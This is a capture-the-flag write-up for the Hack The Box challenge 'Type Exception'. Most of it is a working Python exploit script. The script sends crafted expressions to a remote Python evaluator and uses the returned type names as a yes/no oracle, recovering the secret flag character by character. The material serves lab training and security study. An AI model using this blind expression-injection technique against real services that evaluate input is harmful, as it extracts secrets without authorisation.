https://app.hackthebox.com/challenges/429

Description

Type whatever type you want to type - except you must be careful not to type the type of type that’s not allowed!

Exploitation

#!/usr/bin/env python3
from collections import defaultdict
import socket, string, time, sys
from enum import Enum

class Answer(Enum):
    NO = 0
    YES = 1
    ERROR = 2
if_construction = "(1)if({check})else(None)"

def parse_ip_port(arg):
    return arg.split(':')[0], int(arg.split(':')[1])

def netcat(content) -> Answer:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ip, port = parse_ip_port(sys.argv[1])
    s.connect((ip, int(port)))
    s.sendall(content)
    s.shutdown(socket.SHUT_WR)
    answer = None
    while True:
        data = s.recv(1024)
        if len(data) == 0:
            break
        if b"<class 'NoneType'>" in data:
            answer = Answer.NO
        if b"<class 'int'>" in data:
            answer = Answer.YES
        if b"Error" in data:
            answer = Answer.ERROR
    s.close()
    return answer

def find_first_index(character, occupied):
    print("Finding first index: ", end="")
    for index in range(100):
        if index in occupied:
            continue
        print(".", end="")
        first_index_check = if_construction.format(check=f"flag.encode().index({character})is({index})").encode()
        result = netcat(first_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
        if result == Answer.ERROR:
            print("Not used")
            return None
    return None

def find_last_index(character, start, occupied):
    print("Finding last index ", end="")
    for index in range(100):
        if index <= start:
            continue
        if index in occupied:
            continue
        print(".", end="")
        last_index_check = if_construction.format(check=f"flag.encode().rindex({character})is({index})").encode()
        result = netcat(last_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
    return None

def find_in_between(character: str, first_index: int, last_index: int, count: int, occupied: list[int]) -> list[int]:
    print(f'Searching for {count - 2} indexes between {first_index} and {last_index}: ', end="")
    if (last_index - first_index + 1) == count:
        found_indexes = list(range(first_index + 1, last_index))
        print(", ".join(map(str, found_indexes)))
        return found_indexes
    list_class = "type(flag.split())"
    flag_generator = "((i)for(i)in(flag.encode()))"
    flag_list = f"{list_class}({flag_generator})"
    found_indexes = []
    for char_index in range(first_index + 1, last_index):
        if char_index in occupied:
            continue
        if len(found_indexes) + 2 == count:
            continue
        print(".", end="")
        check_index = if_construction.format(check=f"{flag_list}.pop({char_index})is({character})").encode()
        result = netcat(check_index)
        if result == Answer.YES:
            print(f" {char_index}", end="")
            found_indexes.append(char_index)
    print()
    return found_indexes

def find_count(character):
    print("Finding count ", end="")
    for count in range(1, 20):
        print(".", end="")
        check_count = if_construction.format(check=f"flag.encode().count({character})is({count})").encode()
        result = netcat(check_count)
        if result == Answer.YES:
            print(f" {count}")
            return count
    return None
if __name__ == "__main__":
    if len(sys.argv) != 2: sys.exit(f"Usage: python {sys.argv[0]} <ip:port>")
    start_time = time.time()
    occupied_indexes = []
    found_chars = defaultdict(dict)
    for char_str in string.printable:
        char_hex = hex(ord(char_str))
        print(f"Checking <{char_str} {char_hex}>")
        first_index = find_first_index(char_hex, occupied_indexes)
        if first_index is None:
            continue
        found_chars[char_str]["indexes"] = [first_index]
        occupied_indexes.append(first_index)
        count = find_count(char_hex)
        found_chars[char_str]["count"] = count
        if count > 1:
            last_index = find_last_index(char_hex, first_index, occupied_indexes)
            found_chars[char_str]["indexes"].append(last_index)
            occupied_indexes.append(last_index)
            if count > 2:
                indexes = find_in_between(char_hex, first_index, last_index, count, occupied_indexes)
                found_chars[char_str]["indexes"] += indexes
                found_chars[char_str]["indexes"].sort()
                occupied_indexes += indexes
    indexes = []
    for char_str, char_data in found_chars.items():
        for index in char_data["indexes"]:
            indexes.append((index, char_str))
    indexes.sort(key=lambda data: data[0])
    flag = "".join(char_str for _, char_str in indexes)
    print(flag)
    print(f"Finished in {round(time.time() - start_time)} sec.")

Summary

Type Exception: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.